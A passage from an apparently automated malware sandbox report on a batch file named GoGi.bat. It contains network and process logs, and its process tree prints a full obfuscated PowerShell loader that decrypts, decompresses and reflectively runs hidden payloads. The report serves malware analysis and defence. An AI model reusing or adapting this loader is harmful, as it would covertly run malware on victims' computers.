                  Apr 20, 2024 10:19:43.214117050 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:43.412944078 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:43.414868116 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:43.658490896 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:43.659795046 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:43.908442020 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:57.526086092 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:57.767800093 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:57.767875910 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:57.968595028 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:58.010194063 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:58.209873915 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:58.212950945 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:58.455215931 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:19:58.455730915 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:19:58.705383062 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:12.245081902 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:12.486665964 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:12.486741066 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:12.687424898 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:12.728933096 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:12.929799080 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:12.931580067 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:13.174305916 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:13.179747105 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:13.424252033 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:13.619841099 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:13.861746073 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:13.862263918 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:14.068340063 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:14.119586945 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:14.318921089 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:14.320976019 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:14.564934969 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:14.564996004 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:14.817154884 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:19.916686058 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:20.158382893 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:20.158457041 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:20.358746052 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:20.400825977 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:20.599632978 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:20.601475954 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:20.845763922 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:20.846365929 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:21.095868111 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:25.979157925 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:26.221091032 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:26.221184015 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:26.425781965 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:26.478946924 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:26.678265095 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:26.680150032 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:26.924226999 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:26.924302101 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:27.174348116 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:29.779697895 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:30.033683062 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:30.039678097 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:30.240197897 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:30.291467905 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:30.490618944 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:30.493357897 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:30.737617016 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:30.737680912 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:30.986681938 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:36.932312965 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:37.174084902 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:37.174268961 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:37.374916077 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:37.418203115 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:37.617552042 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:37.619271994 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:37.861643076 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:37.861788988 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:38.112013102 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:42.494888067 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:42.736486912 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:42.736553907 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:42.936418056 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:42.978940964 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:43.177968979 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:43.181123018 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:43.424295902 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:43.427709103 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:43.674841881 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:54.916750908 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:55.158238888 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:55.158302069 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:55.358663082 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:55.400842905 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:55.599873066 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:55.602018118 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:55.845987082 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:20:55.849839926 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:20:56.095791101 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:00.354365110 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:00.595860004 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:00.595995903 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:00.802254915 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:00.854063988 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:01.052922964 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:01.054197073 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:01.299246073 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:01.302352905 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:01.548773050 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:07.010512114 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:07.252757072 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:07.258472919 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:07.459393024 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:07.511667013 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:07.710414886 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:07.717989922 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:07.970920086 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:07.978080988 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:08.220859051 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:09.448154926 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:09.689824104 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:09.695761919 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:09.899827003 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:09.947767019 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:10.146950006 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:10.149661064 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:10.392666101 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:10.392734051 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:10.642771006 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:12.166685104 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:12.408283949 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:12.408355951 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:12.608431101 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:12.650832891 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:12.849685907 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:12.851211071 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:13.096019030 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:13.096120119 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:13.345940113 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:24.573182106 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:24.814428091 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:24.814486980 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:25.014925957 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:25.063379049 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:25.262423992 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:25.267167091 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:25.517707109 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:25.517831087 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:25.768084049 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:39.295656919 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:39.549101114 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:39.551664114 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:39.752304077 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:39.807081938 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:40.006201982 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:40.008907080 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:40.252151012 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:40.259730101 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:40.501919985 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:42.791719913 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:43.033513069 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:43.033597946 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:43.237871885 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:43.364079952 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:43.563338041 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:43.565804005 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:43.814551115 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:43.814604998 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:44.064618111 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:44.667649031 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:44.908497095 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:44.908673048 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:45.119687080 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:45.260229111 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:45.459321976 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:45.461055994 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:45.705168962 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:45.705225945 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:45.955584049 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:50.291949987 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:50.533210993 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:50.535696030 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:50.738360882 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:50.963608027 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:51.162642002 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:51.169663906 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:51.430984974 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:51.431044102 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:51.674175978 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:55.604240894 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:55.846261024 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:55.846338034 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:56.047058105 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:56.088323116 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:56.287678957 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:56.289288044 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:56.533498049 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:56.533951998 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:56.740469933 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:56.794245958 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:56.993604898 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:56.995490074 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:57.236463070 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:21:57.237963915 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:21:57.486335039 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:01.604167938 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:01.845654011 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:01.845727921 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:02.045949936 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:02.113437891 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:02.312366009 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:02.312957048 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:02.564448118 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:02.564522028 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:02.814445972 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:16.323276997 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:16.564642906 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:16.564846039 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:16.765058041 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:16.807192087 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:17.006484985 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:17.007227898 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:17.253151894 CEST444949730193.222.96.114192.168.2.4
                  Apr 20, 2024 10:22:17.253221035 CEST497304449192.168.2.4193.222.96.114
                  Apr 20, 2024 10:22:17.502073050 CEST444949730193.222.96.114192.168.2.4
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Apr 20, 2024 10:18:16.279107094 CEST1.1.1.1192.168.2.40x5f89No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                  Apr 20, 2024 10:18:16.279107094 CEST1.1.1.1192.168.2.40x5f89No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:10:17:54
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\GoGi.bat" "
                  Imagebase:0x7ff78a520000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:1
                  Start time:10:17:54
                  Start date:20/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:10:17:54
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\GoGi.bat"
                  Imagebase:0x7ff78a520000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:3
                  Start time:10:17:54
                  Start date:20/04/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:4
                  Start time:10:17:54
                  Start date:20/04/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\GoGi.bat';$gPQY='CmYpnhamYpnnmYpngmYpnemYpnEmYpnxtmYpnenmYpnsmYpniomYpnnmYpn'.Replace('mYpn', ''),'LoaUtEPdUtEP'.Replace('UtEP', ''),'MaiCYgQnMCYgQodCYgQuleCYgQ'.Replace('CYgQ', ''),'SprHTnlitrHTn'.Replace('rHTn', ''),'TrrzhRarzhRnsfrzhRorrzhRmFrzhRirzhRnarzhRlBlrzhRorzhRckrzhR'.Replace('rzhR', ''),'GetuUbXCuUbXuuUbXruUbXreuUbXntuUbXPuUbXrouUbXcuUbXesuUbXsuUbX'.Replace('uUbX', ''),'FrFEdOomBFEdOasFEdOe64FEdOStrFEdOiFEdOngFEdO'.Replace('FEdO', ''),'ReanclddLncldinencldsncld'.Replace('ncld', ''),'DjPqYejPqYcojPqYmpjPqYrejPqYssjPqY'.Replace('jPqY', ''),'IPIJhnvPIJhokPIJhePIJh'.Replace('PIJh', ''),'CopZKPiyTZKPioZKPi'.Replace('ZKPi', ''),'ElIXGDeIXGDmIXGDenIXGDtAIXGDtIXGD'.Replace('IXGD', ''),'CruXrmeuXrmatuXrmeDeuXrmcryuXrmptuXrmoruXrm'.Replace('uXrm', ''),'EJuQRntJuQRrJuQRyPJuQRoinJuQRtJuQR'.Replace('JuQR', '');powershell -w hidden;function oukWk($hMAdX){$uBEEb=[System.Security.Cryptography.Aes]::Create();$uBEEb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uBEEb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uBEEb.Key=[System.Convert]::($gPQY[6])('TGdOerQan8DiYOIpc1W3E6Uf7wMJSi91JjPhdKuCB3Q=');$uBEEb.IV=[System.Convert]::($gPQY[6])('CruLH9j6aex2cpz0fozZ+w==');$XBRRE=$uBEEb.($gPQY[12])();$gomww=$XBRRE.($gPQY[4])($hMAdX,0,$hMAdX.Length);$XBRRE.Dispose();$uBEEb.Dispose();$gomww;}function SIliJ($hMAdX){$nQeHe=New-Object System.IO.MemoryStream(,$hMAdX);$EvPMN=New-Object System.IO.MemoryStream;$uxdRy=New-Object System.IO.Compression.GZipStream($nQeHe,[IO.Compression.CompressionMode]::($gPQY[8]));$uxdRy.($gPQY[10])($EvPMN);$uxdRy.Dispose();$nQeHe.Dispose();$EvPMN.Dispose();$EvPMN.ToArray();}$WrkBk=[System.IO.File]::($gPQY[7])([Console]::Title);$dItwN=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 5).Substring(2))));$Yylgf=SIliJ (oukWk ([Convert]::($gPQY[6])([System.Linq.Enumerable]::($gPQY[11])($WrkBk, 6).Substring(2))));[System.Reflection.Assembly]::($gPQY[1])([byte[]]$Yylgf).($gPQY[13]).($gPQY[9])($null,$null);[System.Reflection.Assembly]::($gPQY[1])([byte[]]$dItwN).($gPQY[13]).($gPQY[9])($null,$null); "
                  Imagebase:0x7ff78a520000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:5
                  Start time:10:17:54
                  Start date:20/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:6
                  Start time:10:17:57
                  Start date:20/04/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:1.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:0%
                    Total number of Nodes:8
                    Total number of Limit Nodes:1
                    execution_graph 11235 7ffd9b8a45ea 11236 7ffd9b8efc40 GetFileType 11235->11236 11238 7ffd9b8efcc4 11236->11238 11239 7ffd9b8ad4f9 11241 7ffd9b8ad50f 11239->11241 11240 7ffd9b8ad552 11241->11240 11242 7ffd9b8ad67d CreateFileW 11241->11242 11243 7ffd9b8ad6de 11242->11243

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 7ffd9b8a6e20-7ffd9b8ac73a 4 7ffd9b8ac73c-7ffd9b8ac74c 0->4 5 7ffd9b8ac74e-7ffd9b8ac75f 0->5 4->4 4->5 6 7ffd9b8ac770-7ffd9b8ac7a1 5->6 7 7ffd9b8ac761-7ffd9b8ac76f 5->7 11 7ffd9b8ac7f7-7ffd9b8ac7fe 6->11 12 7ffd9b8ac7a3-7ffd9b8ac7a9 6->12 7->6 13 7ffd9b8ac83f-7ffd9b8ac868 11->13 14 7ffd9b8ac800-7ffd9b8ac801 11->14 12->11 15 7ffd9b8ac7ab-7ffd9b8ac7ac 12->15 17 7ffd9b8ac804-7ffd9b8ac807 14->17 16 7ffd9b8ac7af-7ffd9b8ac7b2 15->16 18 7ffd9b8ac7b8-7ffd9b8ac7c8 16->18 19 7ffd9b8ac869-7ffd9b8aca2c call 7ffd9b8a4620 16->19 17->19 20 7ffd9b8ac809-7ffd9b8ac81a 17->20 22 7ffd9b8ac7ca-7ffd9b8ac7ec 18->22 23 7ffd9b8ac7f0-7ffd9b8ac7f5 18->23 50 7ffd9b8aca35-7ffd9b8aca39 19->50 51 7ffd9b8aca2e-7ffd9b8aca33 19->51 24 7ffd9b8ac836-7ffd9b8ac83d 20->24 25 7ffd9b8ac81c-7ffd9b8ac822 20->25 22->23 23->11 23->16 24->13 24->17 25->19 28 7ffd9b8ac824-7ffd9b8ac832 25->28 28->24 52 7ffd9b8aca3c-7ffd9b8aca87 50->52 51->52 56 7ffd9b8aca89-7ffd9b8aca8e 52->56 57 7ffd9b8aca90-7ffd9b8aca94 52->57 58 7ffd9b8aca97-7ffd9b8acb2c 56->58 57->58 66 7ffd9b8acb33-7ffd9b8acb93 58->66 67 7ffd9b8acb9a-7ffd9b8acbb6 66->67 69 7ffd9b8acbb8-7ffd9b8acbba 67->69 70 7ffd9b8acbbc-7ffd9b8acbd5 67->70 71 7ffd9b8acbd7-7ffd9b8acbe5 69->71 70->71 73 7ffd9b8acbeb-7ffd9b8acc58 call 7ffd9b8a7c08 71->73 74 7ffd9b8acc72-7ffd9b8acc9e 71->74 103 7ffd9b8acc5a-7ffd9b8acc65 73->103 77 7ffd9b8acd58-7ffd9b8acd98 74->77 78 7ffd9b8acca4-7ffd9b8acd57 call 7ffd9b8a7bb8 74->78 87 7ffd9b8ace89-7ffd9b8ace97 call 7ffd9b8acf2e 77->87 88 7ffd9b8acd9e-7ffd9b8acdac 77->88 78->77 101 7ffd9b8ace99-7ffd9b8acea9 87->101 102 7ffd9b8aceaa-7ffd9b8aceb5 87->102 91 7ffd9b8ace41-7ffd9b8ace6f 88->91 92 7ffd9b8acdb2-7ffd9b8acdbd 88->92 104 7ffd9b8ace71-7ffd9b8ace81 91->104 105 7ffd9b8ace82-7ffd9b8ace86 91->105 101->102 112 7ffd9b8aceb7-7ffd9b8acefb call 7ffd9b8a2ed8 102->112 113 7ffd9b8acf0d-7ffd9b8acf2d 102->113 110 7ffd9b8acc67-7ffd9b8acc71 103->110 111 7ffd9b8acc59 103->111 104->105 105->87 110->74 111->103 112->113
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.1714042185.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                    Joe Sandbox IDA Plugin
